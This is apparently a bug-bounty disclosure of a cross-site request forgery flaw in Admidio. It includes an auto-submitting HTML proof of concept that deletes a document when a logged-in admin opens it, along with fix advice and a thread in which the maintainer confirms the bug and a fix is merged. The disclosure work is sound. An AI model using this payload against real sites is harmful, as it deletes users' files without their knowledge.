Cross-Site Request Forgery (CSRF) in admidio/admidio

Valid

Reported on

Aug 17th 2021


✍️ Description

Attacker able to delete any File & Doc with CSRF attack.

It does not matter at all that your application run in localhost or elsewhere, just it is enough to run on a browser and another low privilege user or attackers know the IP address or hostname of your application.

In CSRF attacks it is necessary that a user logged into your application and just going to a malicious website and after that only with a redirection attacker can perform attack on unprotected endpoint, this means only with visiting a site a unwanted action will be perform without that user aware from that.

🕵️‍♂️ Proof of Concept

1.fisrt admin already should be logged in Browser.

2.Open the PoC.html (it is auto-submit).

3.Here a File & Doc with file_id 8 will be deleted after the PoC.html file opened.

// PoC.html


<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/admidio/adm_program/modules/documents-files/documents_files_function.php">
      <input type="hidden" name="mode" value="2" />
      <input type="hidden" name="file&#95;id" value="8" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>


This PoC can perform attack without that users noticed and Also PoC can send multiple request at same time that means attacker can Bruteforce all possible actions ( with using multiple Iframes )

💥 Impact

This vulnerability is capable of delete any File & Doc.

Fix

The easiest way that you set strict attribute on each cookie, Or you set Lax and Use GET requests only for receiving data not changing them.

The best way is that you set a CSRF token in each endpoint.

📍 Location index.php#L1

amammad modified the report
a year ago
amammad
a year ago

Researcher


@admin

Hey dear Huntr team, I think you contacted with admidio team before, If you have their email why I can't see any contact notification?

amammad modified the report
a year ago
amammad modified the report
a year ago
Z-Old
a year ago

Admin


Hey ammamad, I've reached out to admidio. Waiting to hear back.

We have contacted a member of the admidio team and are waiting to hear back a year ago
amammad
a year ago

Researcher


@admin Hey Ziding, Any feedback from admidio team?

Z-Old
a year ago

Admin


Hey amammad, we haven't heard anything back yet. Follow-up functionality will be shipped soon, which should help with responsiveness.

admidio/admidio maintainer
a year ago

Maintainer


Hi together, sorry for the delay in response. I could confirm your Cross-Site Request Forgery. That is a general problem in Admidio that we don't use a csrf token within forms and use get methods to delete data.

Btw Is it necessary to open a new issue here for every form or get method you found?

amammad
a year ago

Researcher


Hey dear,

In My opinion it is necessary as sometimes some Maintainers forget to fix all endpoint like your previous CSRF fixes that you didn't fix all endpoints

at this moment Huntr team trying to merge these kind of reports in one report for next release of Huntr.dev application.

amammad
a year ago

Researcher


dear admidio team, can i ask you to validate my reports please? they will be remain hidden after your validation.

best regards.

admidio/admidio maintainer validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
admidio/admidio maintainer
a year ago

Maintainer


Oh yes of course I can do that.

Markus Faßbender confirmed that a fix has been merged on eec453 7 months ago
Markus Faßbender has been awarded the fix bounty
Markus
7 months ago

Maintainer


Thanks for the research.

to join this conversation